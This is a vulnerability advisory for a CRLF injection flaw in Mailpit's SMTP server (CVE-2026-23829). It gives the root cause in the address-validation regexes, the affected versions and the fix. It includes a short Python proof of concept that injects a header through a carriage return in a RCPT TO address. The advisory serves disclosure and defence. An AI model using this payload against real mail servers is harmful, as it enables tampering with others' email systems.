Mailpit SMTP CRLF Injection
Mailpit SMTP CRLF Injection
Mailpit SMTP CRLF Injection

Mailpit - SMTP CRLF Injection via Regex Mailpit SMTP CRLF Injection

Mailpit - SMTP CRLF Injection via Regex Bypass
Advisory ID: RO-26-004
CVE ID: CVE-2026-23829
Severity: Medium
Vendor: axllent
Product: Mailpit
Version: <= v1.28.2


Overview #

A CRLF Injection vulnerability exists in Mailpit's SMTP server. The vulnerability allows attackers to inject arbitrary SMTP headers by including carriage return characters (\r) in email addresses due to insufficient regex validation.


Vulnerability Details #

Affected Versions: <= v1.28.2

Root Cause: The regex patterns used to validate RCPT TO and MAIL FROM addresses fail to exclude \r and \n characters. The \v escape sequence inside a character class only matches Vertical Tab, not CR/LF.

Vulnerable Code: The vulnerability exists in internal/smtpd/smtpd.go:

rcptToRE = regexp.MustCompile(`(?i)TO: ?<([^<>\v]+)>( |$)(.*)?`)
mailFromRE = regexp.MustCompile(`(?i)FROM: ?<(|[^<>\v]+)>( |$)(.*)?`)



Exploitation Requirements #

Network access to SMTP port (default 1025)
No authentication required

Impact #

Remote attackers can exploit this vulnerability to:

Inject arbitrary SMTP headers
Corrupt email metadata and Received headers
Generate malformed .eml files
Violate RFC 5321 compliance

Proof of Concept #

import socket

def exploit():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 1025))
s.recv(1024)
s.send(b"EHLO test.com\r\n")
s.recv(1024)
s.send(b"MAIL FROM:<This email address is being protected from spambots. You need JavaScript enabled to view it.>\r\n")
s.recv(1024)
# Injecting \r
payload = b"RCPT TO:<victim\rX-Injected: Yes>\r\n"
s.send(payload)
resp = s.recv(1024)
print(f"Server Response: {resp.decode()}") # Expect 250 OK
s.close()

exploit()



Solution #

Upgrade to Mailpit version 1.28.3 or later.


References #

GitHub Security Advisory GHSA-54wq-72mp-cq7c
CWE-93: CRLF Injection
CWE-150: Improper Neutralization of Escape Sequences

Timeline:

[2026-01-13] - Reported
[2026-01-15] - Fixed
[2026-01-17] - CVE Assigned
[2026-01-18] - Published

Credits: Omar Kurt
Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.